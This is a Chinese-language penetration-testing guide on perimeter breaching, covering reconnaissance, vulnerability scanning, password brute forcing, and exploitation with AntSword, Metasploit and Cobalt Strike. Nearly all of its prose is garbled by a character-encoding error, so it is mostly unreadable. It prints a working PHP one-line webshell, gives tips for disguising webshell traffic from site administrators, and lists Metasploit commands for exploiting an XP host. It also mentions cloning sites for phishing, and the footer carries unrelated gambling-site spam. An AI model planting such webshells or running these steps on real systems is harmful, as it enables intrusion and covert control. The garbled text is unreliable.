¸ÅÊö
ÉøÍ¸²âÊÔµÄÄ¿µÄ¿ÉÒÔÊǵ¥¸öÖ÷»ú£¬£¬£¬£¬£¬£¬Ò²¿ÉÒÔÊÇÕû¸öÄÚÍø¡£¡£¡£¡£¡£¡£¡£¡£ÔÚʵսÖУ¬£¬£¬£¬£¬£¬ºÃ±È×î½üÈç»ðÈçݱµÄHWÐж¯£¬£¬£¬£¬£¬£¬¸ü¶àµÄÊǶÔÒ»¸öÄ¿µÄµÄÄÚÍø¾ÙÐÐÉøÍ¸£¬£¬£¬£¬£¬£¬ÕùÈ¡»ñµÃËùÓÐÓмÛÖµµÄ×ʲú¡£¡£¡£¡£¡£¡£¡£¡£ÍêÕûµÄÄÚÍøÉøÍ¸Éæ¼°µÄ°ì·¨ÈçÏÂͼËùʾ¡£¡£¡£¡£¡£¡£¡£¡£ÎÒÃÇ×ÜÊÇÏÈͨ¹ý¶ÔÍâÌṩ·þÎñµÄ£¬£¬£¬£¬£¬£¬·ÀÊØ×ÈõµÄÖ÷»ú´ò½øÈ¥£¬£¬£¬£¬£¬£¬È»ºó´î½¨ËíµÀ£¬£¬£¬£¬£¬£¬Í¨¹ý¸ÃÖ÷ʱ»ú¼ûÄÚ²¿µÄÆäËûÖ÷»ú¡£¡£¡£¡£¡£¡£¡£¡£¿£¿£¿£¿£¿£¿£¿£¿ìËÙºáÏòÒÆ¶¯µ½µ½ÄÚÍøÖеĽ¹µã×ʲú£¬£¬£¬£¬£¬£¬»ñÈ¡½¹µãÃô¸ÐÊý¾ÝºÍȨÏÞ£¬£¬£¬£¬£¬£¬Íê³ÉÒ»´ÎÌÛÍ´µÄ¹¥»÷¡£¡£¡£¡£¡£¡£¡£¡£

Step 1 ÐÅÏ¢ÍøÂç
Íê³É½çÏßÍ»ÆÆµÄµÚÒ»²½ÊÇÄ¿µÄ¹¤¾ß×ʲúµÄÐÅÏ¢ÍøÂç¡£¡£¡£¡£¡£¡£¡£¡£²î±ðÓÚÄÚÍøÉøÍ¸»·½ÚÖÐÐÅÏ¢ÍøÂ磨ºóÉøÍ¸£©£¬£¬£¬£¬£¬£¬´Ë²¿·ÖÐÅÏ¢ÍøÂçµÄÖ÷ÒªÕë¶Ô¹¤¾ßΪĿµÄ·þÎñÆ÷ϵͳ¡¢Êý¾Ý¿âϵͳ¡¢ÖÐÐļþϵͳ¡¢Ó¦ÓóÌÐòϵͳ¡¢ÒÔ¼°½çÏßÐÅÏ¢µÈ¡£¡£¡£¡£¡£¡£¡£¡£ÐëҪʱ¼ä»¹ÒªÕë¶Ôϵͳ¹ÜÀíÔ±¾ÙÐÐÐÅÏ¢ÍøÂç¡£¡£¡£¡£¡£¡£¡£¡£ÕâЩ×ÅʵÊÇΪÁËÕÒµ½Å³Èõ×ʲú¾ÙÐй¥»÷£¬£¬£¬£¬£¬£¬ÊÂʵ¡°ÊÁ×ÓÌôÈíµÄÄ󡱡£¡£¡£¡£¡£¡£¡£¡£
1.1 ÓòÃû¼°×ÓÓòÃû
OneForAll
´ÓÓòÃûÕÒIPÒÔ¼°×ÓÓòÃû±¬ÆÆ»¹Ã»ÓÐÂÄÀú¹ý£¬£¬£¬£¬£¬£¬Ö®ºóÂÄÀúÁËÔÙ¸üС£¡£¡£¡£¡£¡£¡£¡£
https://github.com/shmilylty/OneForAll
1.2 Ö÷»ú¡¢¶Ë¿ÚºÍÐÒé
Ö÷»ú´æ»î -> ²Ù×÷ϵͳ , ¶Ë¿Ú¿ª·Å -> ͨѶÐÒé
whois + ip È·¶¨IPÍø¶Î

Nmap
Éó²é¶Ë¿Ú¿ª·Å¼°ÆäÉÏͨѶÐÒ飺
namp -sS -sU target_ip -p 100-27018
-sS ΪTCP SYNɨÃè¾ßÓиüÇ¿Òþ²ØÐÔ£¬£¬£¬£¬£¬£¬²»½¨ÉèÅþÁ¬;
-sU ¼¤»îUDPɨÃ裬£¬£¬£¬£¬£¬¼ì²â¶Ë¿ÚÉÏ¿ªÆôµÄUDP·þÎñ£»£»£»£»£»£»£»£»
-p Ö¸¶¨É¨ÃèµÄ¶Ë¿Ú¹æÄ££¬£¬£¬£¬£¬£¬µ«»áÔ½·¢ºÄʱ£»£»£»£»£»£»£»£»
ÒÔÉÏÕâÁ½¸öÏÂÁîÔÚûÓзÀ»ðǽµÄʱ¼ä½ÏÁ¿¹ÜÓᣡ£¡£¡£¡£¡£¡£¡£ÈôÊÇÐèÒªÈÆÇ½µÄ»°£¬£¬£¬£¬£¬£¬ÐèҪѡÔñÆäËûÕ½ÂÔÈçË鯬ɍÃ裬£¬£¬£¬£¬£¬¾àÀëɨÃèµÈ£¬£¬£¬£¬£¬£¬Ö®ºóÓöµ½ÁËÔÙÕûÀí¡£¡£¡£¡£¡£¡£¡£¡£¿ÉÊÇ˼Ð÷¾ÍÊÇÊÓ²ì¶Ô·½µÄÏìÓ¦°üÈ»ºóÊµÊ±Ìæ»»Õ½ÂÔ»òÕß×éºÏÕ½ÂÔ¡£¡£¡£¡£¡£¡£¡£¡£
sudo nmap -A --version-intensity 9 target_ip -p target_port
-A ͬʱ·¿ª²Ù×÷ϵͳ̽²âºÍ°æ±¾Ì½²â£¬£¬£¬£¬£¬£¬ÆäÖвÙ×÷ϵͳ̽²âÐèÒªsudoȨÏÞ£»£»£»£»£»£»£»£»
--version-intensity È·¶¨°æ±¾É¨ÃèµÄÇ¿¶È£»£»£»£»£»£»£»£»
target_port ÊÇÉÏÊöÏÂÁîÖ´ÐÐÖ®ºó»ñµÃµÄ¿ªÆôµÄ¶Ë¿Ú
masscan ¸ßËÙ ÎÞ״̬ɨÃè
ͨ¹ýmasscanÒ²¿ÉÒÔ¿ìËÙɨÃè»ñµÃC¶ÎºÍÅÔÕ¾¡£¡£¡£¡£¡£¡£¡£¡£ÆäÖÐÅÔÕ¾ÊÇָͳһ̨·þÎñÆ÷ÉÏµÄÆäËûÍøÕ¾£¬£¬£¬£¬£¬£¬C¶ÎÊÇָͳһÄÚÍøÍø¶ÎÖÐµÄÆäËû·þÎñÆ÷
FOFA Zoomeye µÈÍøÂç×ʲú¿Õ¼ä²â»æÒýÇæ
ÈôÊÇΪÁËÒþ²Ø£¬£¬£¬£¬£¬£¬Ò²¿ÉÒÔÖ±½ÓʹÓñ»¶¯ÐÅÏ¢ËѼ¯ÈçfofaÖ±½ÓÈ¥ËÑIP¡£¡£¡£¡£¡£¡£¡£¡£
1.3 ¶Ë¿Ú·þÎñ¼°ÆäÉÏ¿ò¼ÜCMS»ò×é¼þ
Wapoalyzer
¹ØÓÚÍøÕ¾¶øÑÔ£¬£¬£¬£¬£¬£¬¿ÉÒÔʹÓÃchromeµÄ²å¼þWappalyzerÈ¥ÆÊÎö°üÀ¨Ç°¶Ë¿ò¼Ü£¬£¬£¬£¬£¬£¬ºó¶Ë¿ò¼Ü¡¢·þÎñÆ÷ÀàÐÍ¡¢²å¼þ¡¢±à³ÌÓïÑԵȵȰ汾ÐÅÏ¢¡£¡£¡£¡£¡£¡£¡£¡£
ÊÖ¹¤ÆÊÎö
¿ÉÊÇÒ»¶¨²»¿ÉÒÀÀµÓÚÒ»¸ö²å¼þ¸ã¶¨Ò»ÇУ¬£¬£¬£¬£¬£¬´ó´ó¶¼ÇéÐÎÏÂÐèÒª¶ÔÍøÕ¾¾ÙÐÐÊÖ¹¤Ê¶±ð£¬£¬£¬£¬£¬£¬ÈçHTTPµÄÏìӦͷ£¬£¬£¬£¬£¬£¬HTMLµÄbody¡¢title¡¢meta¡¢classÃüÃû£¬£¬£¬£¬£¬£¬ÍøÕ¾µÄĿ¼½á¹¹ÒÔ¼°±¨´íÐÅÏ¢µÈ¡£¡£¡£¡£¡£¡£¡£¡£
Github
ÔÚ»ñµÃÏêϸ¿ò¼ÜÖ®ºó¿ÉÒÔʵÑéÔÚgithubÉÏËÑһϣ¬£¬£¬£¬£¬£¬¿ÉÄÜ»áÓÐÍøÕ¾µÄÔ´Â룬£¬£¬£¬£¬£¬»òÕßÐí¶àÓÐÓõÄÐÅÏ¢¡£¡£¡£¡£¡£¡£¡£¡£
ÔÆÏ¤Æ½Ì¨
±ðµÄ£¬£¬£¬£¬£¬£¬ÔÆÏ¤×ʲú̽²âƽ̨ºÜºÃÓ㬣¬£¬£¬£¬£¬¿ÉÊÇÐèÒªÔ¼ÇëÂë¡£¡£¡£¡£¡£¡£¡£¡£Õⲿ·ÖÖ÷ÒªµÄÄÚÈݲ»¹ýÊÇÈ·¶¨¿ò¼ÜºÍ×é¼þ£¬£¬£¬£¬£¬£¬ÉÐÓа汾ÐÅÏ¢¡£¡£¡£¡£¡£¡£¡£¡£ÓÐÁ˰汾ÐÅÏ¢¾Í¿ÉÒÔÈ¥ÕÒһЩûÓÐÐÞ¸´µÄÎó²î¹¥½øÈ¥¡£¡£¡£¡£¡£¡£¡£¡£
1.4 Wafʶ±ð
wafw00f
wafw00fÊÇÒ»¸öWebÓ¦Ó÷À»ðǽ£¨WAF£©Ö¸ÎÆÊ¶±ðµÄ¹¤¾ß¡£¡£¡£¡£¡£¡£¡£¡£
ÏÂÔØµØÖ·£ºhttps://github.com/EnableSecurity/wafw00f
1.5 Ŀ¼±¬ÆÆ
µ«·²Éæ¼°µ½±¬ÆÆ£¬£¬£¬£¬£¬£¬Ò»¶¨ÊÇÐèÒªºÏÊʵÄ×ÖµäµÄ¡£¡£¡£¡£¡£¡£¡£¡£ÈôÊÇ¿ÉÒÔÈ·¶¨ÍøÕ¾µÄ¿ò¼Ü£¬£¬£¬£¬£¬£¬ÄÇô¿ÉÒÔͨ¹ýѰÕÒÆäÍøÕ¾¿ò¼Ü»òÕßϵͳµÄÔ´Âë¿ÉÒÔ»ñµÃ¿ÉÄܱ£´æµÄ·¾¶£¬£¬£¬£¬£¬£¬´ó´óïÔ̱¬ÆÆ´ÎÊý¡£¡£¡£¡£¡£¡£¡£¡£±ðµÄ£¬£¬£¬£¬£¬£¬Í¨¹ýGoogle HackingÒ²¿ÉÄÜÓÐÒâÏë²»µ½µÄÊÕ»ñ¡£¡£¡£¡£¡£¡£¡£¡£×îºÃÊÇÒÑÖª¸ú·¾¶Ö®ºóÔÙȥɨ·¾¶Ï¿ÉÒÔ»á¼ûµ½µÄÎļþ£¬£¬£¬£¬£¬£¬ÕâÑù¿ÉÒÔ¼«´óµØÌá¸ß±¬ÆÆÐ§ÂÊ¡£¡£¡£¡£¡£¡£¡£¡£
dirsearch
https://github.com/maurosoria/dirsearch
Google Hacking
Google HackingµÄ¹¦Ð§ÓкÜÊǶ࣬£¬£¬£¬£¬£¬½èÖúÓÚGoogleËÑË÷ÒýÇæ£¬£¬£¬£¬£¬£¬Ëü¿ÉÒÔ×ÊÖúÎÒÃÇ×öµ½Èç×ÓÓòÃû»ñÈ¡¡¢C¶ÎºÍÅÔվɨÃè¡¢Ãô¸Ð·¾¶É¨Ãè¡¢Ãô¸ÐÄÚÈÝÅÌÎʵȵȡ£¡£¡£¡£¡£¡£¡£¡£


¿ÉÒԲο¼ÕâÆª²©¿Í https://www.cnblogs.com/H4ck3R-XiX/p/12489218.html
Step 2 Îó²îɨÃè
¹ØÓÚÎó²îɨÃ裬£¬£¬£¬£¬£¬ÎÒµÄÃ÷È·Êǵ±ÇåÎúÄã×ʲúÉÏÔËÐеķþÎñ¡¢¿ò¼Ü»òÕß×é¼þµÄÃû³ÆºÍ°æ±¾µÄʱ¼ä£¬£¬£¬£¬£¬£¬Ö±½ÓËÑË÷ÒýÇæÈ¥ÕÒ1day¾Í¾Í¿ÉÒÔ¡£¡£¡£¡£¡£¡£¡£¡£ÏÖÔÚÍøÕ¾»ù±¾¶¼ÊǶþ´Î¿ª·¢£¬£¬£¬£¬£¬£¬Ò»¶¨ÒѾ±»ÈËÑо¿¹ýÁË¡£¡£¡£¡£¡£¡£¡£¡£ÒÔÊÇÕâÓ¦¸ÃÊÇ×îÏÈʵÑéµÄ£¬£¬£¬£¬£¬£¬¶ø²»ÊÇÖ±½ÓÉϹ¤¾ß¡£¡£¡£¡£¡£¡£¡£¡£
½ÓÏÂÀ´£¬£¬£¬£¬£¬£¬¿ÉÒÔʹÓÃXray¡¢MSF»òÕßÌØ¶¨¿ò¼ÜµÄÎó²îɨÃèÆ÷ͨ¹ýPOCȥȷÈÏÍøÕ¾ÊÇ·ñº¬ÓиÃÎó²î¡£¡£¡£¡£¡£¡£¡£¡£²»ÒªÖ±½ÓʹÓÃXrayÈ¥×Ô¶¯É¨ÃèÍøÕ¾£¬£¬£¬£¬£¬£¬ÊÔͼͨ¹ý̽²âËùÓÐweb½Ó¿ÚÈ¥ÕÒÎó²î£¬£¬£¬£¬£¬£¬Ð§Âʺܵ͡£¡£¡£¡£¡£¡£¡£¡£
2.1 Xray
XrayÊÇÒ»¿îºÜÊÇÓÅÒìµÄWebɨÃèÆ÷£¬£¬£¬£¬£¬£¬ËüÉè¼ÆµÄ³õÖ¾ÊǺܺõ쬣¬£¬£¬£¬£¬²¢ÇÒÖ§³Ö×Ô½ç˵POC¡£¡£¡£¡£¡£¡£¡£¡£¿ÉÊÇÈôÊÇÄ¿µÄʹÓÃÁËÒѾÐû²¼µÄϵͳ»òÕß¿ò¼Ü£¬£¬£¬£¬£¬£¬ÎÒÃǾÍûÓÐÐëÒª×Ô¼ºÈ¥²âÊÔÁË£¬£¬£¬£¬£¬£¬Ö±½Ó°Ñ±ðÈ˵ÄÑо¿Ð§¹ûÄÃÀ´ÓþͺÃÁË¡£¡£¡£¡£¡£¡£¡£¡£
2.2 ÈõÃÜÂë±¬ÆÆ
ÈôÊÇÕÒµ½ÈκεǼ½çÃæ£¬£¬£¬£¬£¬£¬Ïëµ½µÄµÚÒ»¼þʾÍÓ¦¸ÃÊÇÈõÃÜÂëµÇ¼¡£¡£¡£¡£¡£¡£¡£¡£
¿ÉÊÇ£¬£¬£¬£¬£¬£¬»¹ÒªÈ¥È·ÈÏÍøÕ¾ÓÐûÓÐʹÓÃÑéÖ¤Âë¡£¡£¡£¡£¡£¡£¡£¡£»£»£»£»£»£»£»£»òÕßÑéÖ¤ÂëµÄÊDz»ÊÇ¿ÉÒÔÈÆ¹ýµÄ£¬£¬£¬£¬£¬£¬ºÃ±ÈʵսÖÐÓöµ½µÄÒ»¸öÍøÕ¾µÄÑéÖ¤Âë¾ÍÊÇͨ¹ýÓû§µÄCookieÖеÄidÌìÉúµÄ£¬£¬£¬£¬£¬£¬Ò²¾ÍÊÇ˵µ±Óû§CookieºÍÑéÖ¤ÂëµÄ°ó¶¨ÎȹÌʱ£¬£¬£¬£¬£¬£¬ºǫ́ÑéÖ¤ÓÀÔ¶ÊÇ׼ȷµÄ¡£¡£¡£¡£¡£¡£¡£¡£
ÈôÊÇûÓÐÑéÖ¤Âë»òÕßÑéÖ¤Âë¿ÉÒÔÈÆ¹ý£¬£¬£¬£¬£¬£¬Ôò¿ÉÒÔʹÓÃBurp SuiteÖеÄIntruderÄ£¿£¿£¿£¿£¿£¿£¿£¿é¾ÙÐб¬ÆÆ¡£¡£¡£¡£¡£¡£¡£¡£±ðµÄ£¬£¬£¬£¬£¬£¬ÐèÒª×¢ÖØµÄÊDZ¬ÆÆµÄ×ÖµäÒ»¶¨ÒªÈ¥ËѼ¯Ï£¬£¬£¬£¬£¬£¬×Ô´ø×Öµä×ÅʵÊDz»µÃÐС£¡£¡£¡£¡£¡£¡£¡£
Step 3 Îó²îʹÓÃ
3.1 ÒϽ£
ÒϽ£ÊÇÖйúÓÅÒìµÄWeb ShellÍøÕ¾'¹ÜÀí'Èí¼þ¡£¡£¡£¡£¡£¡£¡£¡£
ÒϽ£µÄÔÀí¶¼ÊÇÔÚ»ñÈ¡ÍøÕ¾ÎļþÐ޸ĻòÕßÏÂÁîÖ´ÐеÄȨÏÞÖ®ºó£¬£¬£¬£¬£¬£¬ÔÚÍøÕ¾µÄºǫ́µÄ´úÂëÖвåÈëÕâÑùÒ»¾äľÂí¡£¡£¡£¡£¡£¡£¡£¡£È»ºóÔÙÈ¥ÇëÇóÕâÑù²åÈëÒ»¾ä»°Ä¾ÂíµÄÎļþ£¬£¬£¬£¬£¬£¬ÔÚÆäÖÐʹÓÃPOSTÇëÇó×ֶβåÈë´ýÖ´ÐеÄÖ¸Á£¬£¬£¬£¬£¬È»ºóÔÙÏìÓ¦°üÖлñÈ¡ÏÂÁîÖ´ÐÐЧ¹û¡£¡£¡£¡£¡£¡£¡£¡£×Åʵ£¬£¬£¬£¬£¬£¬ËùνµÄÃÜÂë'jfe'£¬£¬£¬£¬£¬£¬¾ÍÊÇÇëÇóµÄPOST×Ö¶ÎÃû£¬£¬£¬£¬£¬£¬ÒÔÊÇÕâ¾ä»°µÄÒâ˼¾ÍÊÇÔÚÊý¾Ý°üÖÐPOST×Ö¶ÎÃûΪ'jfe'µÄ×Ö¶Îֵȡ³öÀ´È»ºóÖ´ÐС£¡£¡£¡£¡£¡£¡£¡£ËäÈ»£¬£¬£¬£¬£¬£¬ÆäËûµÄÒþ²ØºÍÈÆ¹ýÒªÁì¶¼ÊÇÔÚÕâ¸öÔÀíÖ®Éϵ쬣¬£¬£¬£¬£¬ºÃ±ÈÌæ»»ÆäËûº¯Êý£¬£¬£¬£¬£¬£¬»ìÏý±àÂ룬£¬£¬£¬£¬£¬ÖØÐÂÌÜд´úÂëµÈ¡£¡£¡£¡£¡£¡£¡£¡£
<?php eval(@$_POST['jfe']); ?>
ĬÈÏÇéÐÎÏ£¬£¬£¬£¬£¬£¬ÒϽ£µÄÁ÷Á¿ÊÇÌØÊâÏÔ×ŵ쬣¬£¬£¬£¬£¬²»¹ýÒ²¿ÉÒÔʹÓòå¼þ»òÕß´úÀí¶ÔÁ÷Á¿¼ÓÃÜ£¬£¬£¬£¬£¬£¬Î޷ǾÍÊÇÔÚÔÓлù´¡ÉÏÔöÌí¼ÓÃܽâÃܵİ취¡£¡£¡£¡£¡£¡£¡£¡£
ÎÒ×Ô¼ºÒÔΪһ¸ö½ÏÁ¿ºÃµÄ·½·¨ÊǰÑÒ»¾ä»°Ä¾Âí»òÕßľÂí´úÂë¶Î¼ÓÔØµ½Ò»¸öƫƧµÄÒ³Ãæ´úÂëÀ£¬£¬£¬£¬£¬È»ºóÔÚÕý³£ÇëÇó»ù´¡ÉÏÔÙÌí¼ÓPOST×ֶδøÉÏÒªÖ´ÐеÄÖ¸Áî¡£¡£¡£¡£¡£¡£¡£¡£ÕâÑùÔÚËûµÄWebĿ¼Àï²¢²»»áÓÐÒ»¸öÎļþÂ䵨£¬£¬£¬£¬£¬£¬²¢ÇÒÇëÇóµÄurlÒ²ÊÇÕý³£µÄ£¬£¬£¬£¬£¬£¬²»»áÒýÆðÍøÕ¾¹ÜÀíÔ±µÄ×¢ÖØ¡£¡£¡£¡£¡£¡£¡£¡£ÈçÏÂËùʾ£¬£¬£¬£¬£¬£¬ÒϽ£Ö§³ÖÌí¼ÓÕý³£ÇëÇóʱÊý¾Ý±¨ÎĵÄÍ·²¿ºÍÇëÇóÌ壬£¬£¬£¬£¬£¬ÒÔ×îºéÁ÷ƽÉÏαװ³ÉÕý³£Á÷Á¿¡£¡£¡£¡£¡£¡£¡£¡£

ÒϽ£Í¨¹ýWeb ShellµÄ·½·¨Íê³ÉÓëÄ¿µÄ»úµÄÒþ²ØÍ¨Ñ¶£¬£¬£¬£¬£¬£¬ÒÔÊǽÏÁ¿Îȹ̡£¡£¡£¡£¡£¡£¡£¡£²¢ÇÒÒϽ£ÓµÓÐͼÐλ¯½çÃæ²¢ÇÒ¹¦Ð§ºÜÊǶ࣬£¬£¬£¬£¬£¬°üÀ¨Web Shell¡¢Îļþ¹ÜÀí¡¢Êý¾Ý²Ù×÷£¨Êý¾Ý¿âÉó²é£©µÈµÈ¡£¡£¡£¡£¡£¡£¡£¡£
3.2 Metasploit (MSF)
MSF×÷Ϊһ¸öÉøÍ¸²âÊÔ¿ò¼Ü¿ÉÒÔÍê³ÉÎó²îɨÃè¡¢Îó²îʹÓá¢ÌìÉú¹¥»÷ÔØºÉ»òľÂí»òshellcode¡¢¼àÌýµÈʹÃü¡£¡£¡£¡£¡£¡£¡£¡£

½ÓÏÂÀ´ÒÔ¹¥»÷һ̨XP×÷ΪʾÀý£¬£¬£¬£¬£¬£¬Ê¹ÓÃmsfµÄ»ù±¾µÄÁ÷³ÌÈçÏ£º
msf6 > search smb type:exploit platform:windows # Õë¶ÔÄ¿µÄʹÓÃexp
msf6 > use 0 # Ñ¡ÔñÒ»¸öexp
msf6 > show options # Éó²é¸ÃexpµÄÑ¡Ïî
msf6 > show payloads # Ñ¡ÔñÓÃÓÚ¼á³ÖÅþÁ¬µÄpayload
msf6 > set RHOST 10.10.10.10 # ÉèÖÃһϵÁÐexpµÄÑ¡Ïî
msf6 > exploit
×îÖÕÀÖ³ÉÄõ½metepreterµÄshell¡£¡£¡£¡£¡£¡£¡£¡£meterpreterÓµÓм«¶àµÄ¹¦Ð§£¬£¬£¬£¬£¬£¬¿ÉÒÔÍê³ÉºóÐøµÄÐÅÏ¢ËѼ¯ºÍÌáȨµÈ£¬£¬£¬£¬£¬£¬ÊǺÜÊÇǿʢµÄºóÉøÍ¸¹¤¾ß¡£¡£¡£¡£¡£¡£¡£¡£
ÎÒÃÇÄÃÏÂÒ»¸öÄ¿µÄµÄ·½·¨µÄÄõ½¸ÃÄ¿µÄµÄshell£¬£¬£¬£¬£¬£¬¼´¿ØÖÆÍ¨µÀ£¬£¬£¬£¬£¬£¬¿ÉÊÇ»ñÈ¡shellµÄ·½·¨ÓÐÐí¶àÖÖ²¢ÇÒÄõ½µÄÒ²ÊDzî±ðµÄshell¡£¡£¡£¡£¡£¡£¡£¡£ÎÒÃÇ¿ÉÒÔ±ÈÕÕÒ»ÏÂÒϽ£¡¢±ùЫµÄwebshell£¬£¬£¬£¬£¬£¬msfµÄmetepreterÒÔ¼°CSµÄbeacon£¬£¬£¬£¬£¬£¬Ë¼Ë÷ËûÃÇÊÇÔõÑùÍê³ÉÒÔÏÂÈýµãµÄ£º
ľÂí¿Í»§¶ËÔÚÄ¿µÄ»úÉϵÄÒþ²Ø
Ö¸ÁîÔÚÄ¿µÄ»úÉÏÔËÐÐÒÔ¼°Ö´ÐÐЧ¹û»ØÏÔ
ľÂí¿Í»§¶ËºÍ·þÎñÆ÷¶ËµÄͨѶ
Õâ¸ö²¿·Ö¿ÉÒԲο¼³¤Í¤µÄÕâÆª²©¿Í[https://zhuanlan.zhihu.com/p/371444680]£¬£¬£¬£¬£¬£¬ÓÉÓÚÎÒ×Ô¼º»¹Ã»ÓÐʱ¼äÈ¥¶ÁËûÃÇʵÏÖµÄÔ´Â룬£¬£¬£¬£¬£¬¿ÉÄÜÖ®ºó»áµ¥¶ÀдһƪÎÄÕ£¬£¬£¬£¬£¬£¬Ì¸Ò»Ì¸×Ô¼ºµÄÃ÷È·¡£¡£¡£¡£¡£¡£¡£¡£
Viper ÊÇmsfµÄͼÐλ¯½çÃæµÄ°æ±¾£¬£¬£¬£¬£¬£¬ËäÈ»ÉÐÓÐÐí¶àÐèÒªÍêÉÆµÄ£¬£¬£¬£¬£¬£¬¿ÉÊÇͼÐλ¯½çÃæÓÀÔ¶ÊǸüÀû±ãÖ±¹ÛµÄ¡£¡£¡£¡£¡£¡£¡£¡£
ÏîÄ¿µØÖ·£ºhttps://github.com/FunnyWolf/Viper

3.3 Cobalt Strike

Cobalt StrikeÔÚº£ÄÚÊÕµ½Á˸ü¶àµÄ´µÅõ£¬£¬£¬£¬£¬£¬¿ÉÊÇ×Ô¼ºÔÚÏÖʵģÄâÉøÍ¸²âÊÔÖÐÕÕ¾ÉʹÓÃMSF¸ü¶àһЩ¡£¡£¡£¡£¡£¡£¡£¡£ÎÒÏÖÔÚµÄÃ÷È·ÊÇCobalt Strike¸üרעÓÚºóÉøÍ¸²âÊÔ£¬£¬£¬£¬£¬£¬ÓµÓÐÔ½·¢Îȹ̵ĿØÖÆÍ¨µÀ£¬£¬£¬£¬£¬£¬²¢ÇÒÖ§³Ö¶àÈËͬʱ×÷Õ½¡£¡£¡£¡£¡£¡£¡£¡£¸üרעÓÚºóÉøÍ¸²âÊÔµÄÒâ˼ÊÇ£¬£¬£¬£¬£¬£¬CSÖ÷ÒªÈÏÕæÌìÉúÖÖÖÖÐÎʽµÄpayload£¬£¬£¬£¬£¬£¬Ò²¾ÍÊÇÓÃÓÚͨѶµÄºóÃÅ£¬£¬£¬£¬£¬£¬¿ÉÊÇÔõÑùʹÓÃÎó²î½«payloadÔÚÄ¿µÄ»úÉÏÔËÐУ¬£¬£¬£¬£¬£¬Ê¹Ä¿µÄÉÏÏߣ¬£¬£¬£¬£¬£¬¾Í²»ÊÇÆäÖ÷Òª¹Ø×¢µãÁË¡£¡£¡£¡£¡£¡£¡£¡£ËüÖ÷ÒªÈÏÕæÄ¿µÄÉÏÏßÖ®ºóµÄºóÐø²Ù×÷¡£¡£¡£¡£¡£¡£¡£¡£
Cobalt StrikeµÄ¿ØÖÆÍ¨µÀ½Ð×öBeacon£¬£¬£¬£¬£¬£¬ÔÚÒþ²ØÐŵÀÉÏΪÎÒÃÇÌṩ·þÎñ£¬£¬£¬£¬£¬£¬ÓÃÓÚºã¾Ã¿ØÖÆÊÜѬȾÖ÷»ú¡£¡£¡£¡£¡£¡£¡£¡£ÓëMSFÖеÄpayloadÍê³ÉµÄÊÇͳһ¼þÊ¡£¡£¡£¡£¡£¡£¡£¡£BeaconÖ§³Öͨ¹ýHTTP(S)¡¢DNS¡¢SMB¡¢TCPËÄÖÖ¾ÙÐÐͨѶ£¬£¬£¬£¬£¬£¬ÊÊÓÃÓÚ¸ü¶àµÄʵս³¡¾°£¬£¬£¬£¬£¬£¬²¢ÇÒÏà±ÈÓÚMSFµÄmeterpreterÔ½·¢Îȹ̡£¡£¡£¡£¡£¡£¡£¡£
Cobalt StrikeµÄºóÉøÍ¸²âÊÔÄ£¿£¿£¿£¿£¿£¿£¿£¿é¿ÉÒÔÐÖúÉøÍ¸²âÊÔÖ°Ô±¾ÙÐÐÐÅÏ¢ÍøÂ硢ȨÏÞÌáÉý¡¢¶Ë¿ÚɨÃè¡¢¶Ë¿Úת·¢¡¢ºáÏòÒÆ¶¯¡¢³¤ÆÚ»¯µÈ²Ù×÷¡£¡£¡£¡£¡£¡£¡£¡£ÕâЩ¹¦Ð§¿ÉÒÔͨ¹ýÌí¼Ó²å¼þÀ´Íê³É¡£¡£¡£¡£¡£¡£¡£¡£
ÖµµÃÒ»ÌáµÄÊÇ£¬£¬£¬£¬£¬£¬CS¾ßÓÐÒ»¼ü¿Ë¡´¹ÂÚÍøÕ¾µÄ¹¦Ð§£¬£¬£¬£¬£¬£¬ÅäºÏÇéÐκͻ°Êõ£¬£¬£¬£¬£¬£¬Ä¿µÄºÜÈÝÒ×Öмơ£¡£¡£¡£¡£¡£¡£¡£

ÎÄÕÂȪԴ£ºjackfromeast.site
×÷Õߣºjackfromeast
ÈôÓÐÇÖȨ£¬£¬£¬£¬£¬£¬ÇëÁªÏµÉ¾³ý
- Òªº¦´Ê±êÇ©£º
- 3377ÌåÓýÍø¹ÙÍøÈë¿Ú ÉøÍ¸²âÊÔ ½çÏßÍ»ÆÆ ÄÚÍøÉøÍ¸

¾©¹«Íø°²±¸ 11010802026257ºÅ